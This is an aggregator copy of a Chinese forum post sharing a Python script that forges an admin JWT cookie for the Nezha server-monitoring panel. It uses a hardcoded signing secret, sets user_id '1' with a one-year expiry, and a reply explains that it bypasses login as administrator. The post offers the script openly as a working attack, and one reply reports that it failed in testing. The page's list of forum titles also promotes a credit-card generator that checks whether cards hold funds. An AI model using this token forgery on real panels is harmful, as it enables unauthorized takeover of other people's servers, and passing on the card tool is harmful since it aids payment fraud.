惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

C
CXSECURITY Database RSS Feed - CXSecurity.com
Stack Overflow Blog
Stack Overflow Blog
月光博客
月光博客
T
Threat Research - Cisco Blogs
小众软件
小众软件
有赞技术团队
有赞技术团队
酷 壳 – CoolShell
酷 壳 – CoolShell
Apple Machine Learning Research
Apple Machine Learning Research
C
Cyber Attacks, Cyber Crime and Cyber Security
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
T
Tailwind CSS Blog
Cisco Talos Blog
Cisco Talos Blog
V
V2EX
博客园 - 【当耐特】
C
Cybersecurity and Infrastructure Security Agency CISA
Hugging Face - Blog
Hugging Face - Blog
The Cloudflare Blog
The Last Watchdog
The Last Watchdog
Simon Willison's Weblog
Simon Willison's Weblog
T
Threatpost
S
Secure Thoughts
O
OpenAI News
P
Proofpoint News Feed
S
SegmentFault 最新的问题
Forbes - Security
Forbes - Security
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Application and Cybersecurity Blog
Application and Cybersecurity Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Last Week in AI
Last Week in AI
宝玉的分享
宝玉的分享
Scott Helme
Scott Helme
T
Tenable Blog
A
Arctic Wolf
L
LINUX DO - 热门话题
爱范儿
爱范儿
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
www.infosecurity-magazine.com
www.infosecurity-magazine.com
V
Visual Studio Blog
Hacker News: Ask HN
Hacker News: Ask HN
Hacker News - Newest:
Hacker News - Newest: "LLM"
腾讯CDC
博客园 - Franky
WordPress大学
WordPress大学
Know Your Adversary
Know Your Adversary
博客园_首页
雷峰网
雷峰网
IT之家
IT之家
PCI Perspectives
PCI Perspectives
L
LINUX DO - 最新话题
H
Heimdal Security Blog

NodeLoc - 最新帖子

NodeLoc 新AI中转站 注册送$5 0.25倍率 gpt-5.5、gpt-image-2 脱口秀讲得一般,腿真的不错 Skyline 🏷️ Singapore 解锁🐔 初体 [已开奖]【抽奖】魔戒不限时间订阅 给大家推荐个在线信用卡生成,还可以检测有效性,还能检测出是否有钱的信用卡,亲测有效,已经白嫖好多平台服务,有需要的点个红心哦 双光纤怎么处理 NodeLoc 突然想到一个问题,DeepSeek靠什么盈利? z.org要停止服务了,以后只有@elektrine.com了 带免税号出OVH IE区法国机房新款ks-le-a 6T大盘16G内存CPU带核显不限流量G口月付仅9.99欧元独服大盘机(物理服务器) ClawCloud 宣布关停 VPS、VDS 及相关托管业务 有个edu邮箱死活抽不出去了,直接送了。如果你愿意的话就给大家发个红包吧。 通过 Google Workspace 实现 14 人民币每年购买 com net 等顶级域名(续费同价) 【告别封号焦虑】推荐一个防关联神器——>指纹浏览器 Geelinx 日本建站🐔开售 怎么还是硬编码啊@FurryAM [UlziX]关于用户反馈回应 [UlziX]新加坡2区提醒 避雷UlziX+细说几大罪状(再次更新) 打发无聊的儿童节,超炫跑酷(粗制滥造) 白嫖机场100G一个月 之前白嫖的cyou域名怎么绑定到cf啊 零零七IDC 每月免单活动 给大家推荐一个机场 机器都是大厂的服务器六一节做活动5折 新gTLD来了 .PAY giffgaff 还有2张带活动的 出一个少一个 Host2Play 自动续期脚本 HidenCloud 自动续期 🎁 免费试用|FluxISP 纯净住宅 IP,指纹浏览器 / 跨境 / 社媒必备 【福利来袭】亲测好用!跨境 / AI / 建站必备,Fluxisp 免费 CDK 体验分享 别让 WSL 吃光 C 盘!Ubuntu .wsl 文件一键装到 D 盘 + 已安装迁移全攻略 限时活动:下载 QoderWork CN 客户端即享首月 Pro 免费,邀请好友还能再赚 40,000 Credits 给大家发点福利:1024Proxy 免费CDK + 邀请奖励活动 【无🐔之谈】好好吃饭、好好休息,照顾好自己,儿童节快乐! 美国-UlziX中奖机怎么还活着? 求一个voxi码 Claude Sonnet 4.6 1M 模型免费白嫖,你没听错,就是可以免费。 辣椒HTTP 送3个住宅IP兑换码 NodeLoc 天涯社区重启,会再现往日的辉煌吗?天涯时代已经结束了. NodeLoc DuoPlus 周年庆活动 | 移动端多账号防关联,云手机开机优惠 某知名拨测平台招募家宽节点,几个细节让我越想越不对 云维护全自动防失联NODE,完全免费,自动更新数据。 Welcome to 域管家 本站loc.cc二级域名cname根域到GitHub Pages一直获取不到ssl证书是什么原因呢? 我太想进步了之NL社区起步你想知道的事 Minimax M3,hhh 【特价】长期稳定出DO账号Azure AWS Linode谷歌云 💻 拒绝风控!1亿+纯净住宅IP池全开,Novproxy 6月双重加码福利,多买多送速度上车! 注册即送 2 刀 加QQ群私聊群主额外得 3 刀,可签到 claude-opus-4-8、gpt-5.5、gpt-image-2 天涯能进去吗 Copliot 6.1开始按 Credits 来计费了 🔥 **6 个月 ChatGPT Pro + 6 个月免费的 Claude Max 20x!** 【抓紧了】来一个日本的最新免费域名!手慢无! NodeLoc 关于DNL无效域名删除等候时长的建议。 EU.ORG审批顺序是怎样的?先申请的先批吗 [UlziX]发挥英国小鸡的最后用处 [已开奖]小网盘开业大吉,抽台小鸡一个月 打包分享我一个一个收藏的车载音乐mp3格式 发现了一个中转集成网址 GNAME域名到期要收费了,你们还续吗? 【曝光】一个NLER 联系我EDU换TG 到目前玩消失 悬赏 1000NL 求一图 VSLLM中转站体验分享 推荐一个美国鸡,能够稳定看4k视频的小鸡 二级域名 FreeTZ 结束公测,正式上线 来扯一扯KG家族吧,加急更新ICKG 刚收到EU.ORG注册成功的邮件 PayPal和微信支付彻底打通了 vps8越来越牛逼 关于ulzix平台基础设施重构备份的问题 .Hyper.ci开放注册! 脱口秀讲得一般,腿真的不错 [赞AI] 已接入 Claude Opus 4.8 自己折腾了个 GPT Image 2 的提示词图库,目前两万多条,顺手分享一下 🌟【家宽车找人】🌟boil 港仔 香港 HKT 家宽 独立ip 300Mbps 独享带宽,不限流量无分流,给lxc小鸡,30/月 大家上班和出去玩怎么平衡啊? 【福利】1024Proxy 免费发放 CDK!注册送流量,支持海外住宅IP/静态IP/跨境业务测试 关于 NodeLoc 社区资源禁止二次赚取的说明 【超全】免费海外虚拟主机推荐!长期更新,建议收藏!目前共36种选择! 手把手教你搭建一个DNL二级域名分发平台(vps8 openapi 适配版) 关于本人二次赚取资源的问题。有赔偿。 DNSHE助力码接力统一帖 真人快打2 Mortal Kombat 2 (2026) 站长公益域名增加二个免费顶级域名,喜欢点赞收藏 FurryNIC ——DNSSR子平台来啦 专门分发Furry域名 补档 三联生活实验室:《2026年中国外卖员生存报告》被下架的纪录片 (大型更新!)FurryNIC更新 #4 FurryOS - 一个网页版操作系统 【CDN推荐】 CDN 全面升级|更快、更稳、更安全❤️想了解找艾玛EMMA NL 的域名分发平台我也部署了一个。 免费 e01.ai VCanvas 在线使用(基于 GLM-5v-Turbo) FreeMcServer 自动续期脚本 几个乐色域名分发平台(当初搜罗了9家,现在还活着6家,唯一支持NS记录的只剩一家棱雨) 可托管CF现有开放可注册免费域名集合[申请置顶,长期更新 ] Roogoo虚拟卡:仅需身份证,零开卡费,跨境支付新选择 NameSeek域名管理工具 V1.1发布
哪吒探针公鸡Python脚本
James (James) · 2026-06-14 · via NodeLoc - 最新帖子
import base64
import json
import hmac
import hashlib
import time

# 配置参数
secret_key = b"brTValLD5zgip27aeUVnxPwbumOX5ZDmnkFK03G7aQuIThhCQzD3MOVDuJgCpj6dXCCKwybN8oY4x73X0AhUmffY38nyHcW75RXAyz89ywDiq5JWKHdvJprqZSmhpvWJwzuer4eiIyQJ4amx7dfdSvmJKsq2HO3ToR63sv9dSbMx19dAmKnCt0enG0GCCztp8ZPqCoplPrIUtem1yT6nkFwT3qhaotjUj0yOw8ACLQuzIRQhS0V3NdlgcHsx3aEHEvunZXsGw3nOBnTb1NU2SpkvDpXcBupFQwPB2VW4dsco5CTUhLNrCcIFw0DGtTZIezpx8xRvOgO7B3VncwWRtFeZhrmwNLWoPpqyVfdrxoHeDIksccfTkf8WheUxn0HEh3sJRxqCrKmUf2LabWBqheQ4g7LrLL7ybrbl5wK23KXJLwUWiLaSLPaRChumf3GUvvBgYmeqF30y7L10dvf8m4jNVikxfmtZKyEwvFULLQfVwiyZ5F2ETlg5q7IwGoBiSFmscuADJQ0zHefnwsrLMAOuQjvOM3gBNhNE3wVMLVWBGKkHdJl7p2CabvlisZl3V6pthuA3TfLrMCEbuefvgeGKpmY5djjBXh4HAw5eonabXKMSxsd5AaZM7eCsJiPccuLm6iixzaHjaLcVcO0NyGQDZgiaySaS8OMCWRj0wyroXLTMWAdRqwRXN7sqki493sCjLp6pGJ9fVCqDmreM7Zn4WGrYYQfzUxTi2RZj3zkXS6rOzHYUrq1CUjQKS4qaim4agkhbQ47JH3bNVBOxgya6Z898iU7E9WFIoAc2sVy7rWPq17EnbeFolm3tjRDp9yxelTGx3bykXSj1fcJ9kSvGPhgxnDl0PcICHBeUqBb4HYUy9fSzfOKVyTxlPfKfUpZOrpOGHIcqttJ8zDcW9IgYXmi6jtfqqOESvyfZVlwVLVHf88HlMtWE6x9UhwP4OS00GPnXrZNnoeoIWDnVjPdXNS2CIRDP0xjfQY9I7GXybzZsu8Uo5kPi3LfDkuoh"
header = {"alg": "HS256", "typ": "JWT"}
# 注意:user_id 必须是字符串 "1",不能是数字 1
payload = {
    "user_id": "1",
    "ip": "104.168.1.54",
    "exp": int(time.time()) + 31536000  # 过期时间设为 1 年后
}

# Base64Url 编码函数
def b64url_encode(data):
    return base64.urlsafe_b64encode(json.dumps(data, separators=(',', ':')).encode('utf-8')).replace(b'=', b'').decode('utf-8')

# 1. 编码 Header 和 Payload
encoded_header = b64url_encode(header)
encoded_payload = b64url_encode(payload)

# 2. 拼接为待签名字符串
signing_input = f"{encoded_header}.{encoded_payload}"

# 3. 使用 HMAC-SHA256 和 Secret Key 进行签名
signature = hmac.new(secret_key, signing_input.encode('utf-8'), hashlib.sha256).digest()
encoded_signature = base64.urlsafe_b64encode(signature).replace(b'=', b'').decode('utf-8')

# 4. 生成最终的 JWT Token
nz_jwt = f"{signing_input}.{encoded_signature}"

print(f"计算得出的 nz-jwt Cookie 值为:\n{nz_jwt}")

这段代码实际是在生成一个哪吒面板的管理员登录凭证:用已知的签名密钥,手工签发一个 user_id="1"(管理员)、有效期一年的 Token,塞进 Cookie 后就能以管理员身份绕过登录。

Mahmut_Udemy (Mahmut Udemy) 5

很遗憾,我也不知道。不过,能给我点个赞吗?

mdx233 (mdx233) 6

:xhj16:

TANGFAN (唐帆) 7

谢谢老大分享

supers (Supers) 8

测试了好像不行。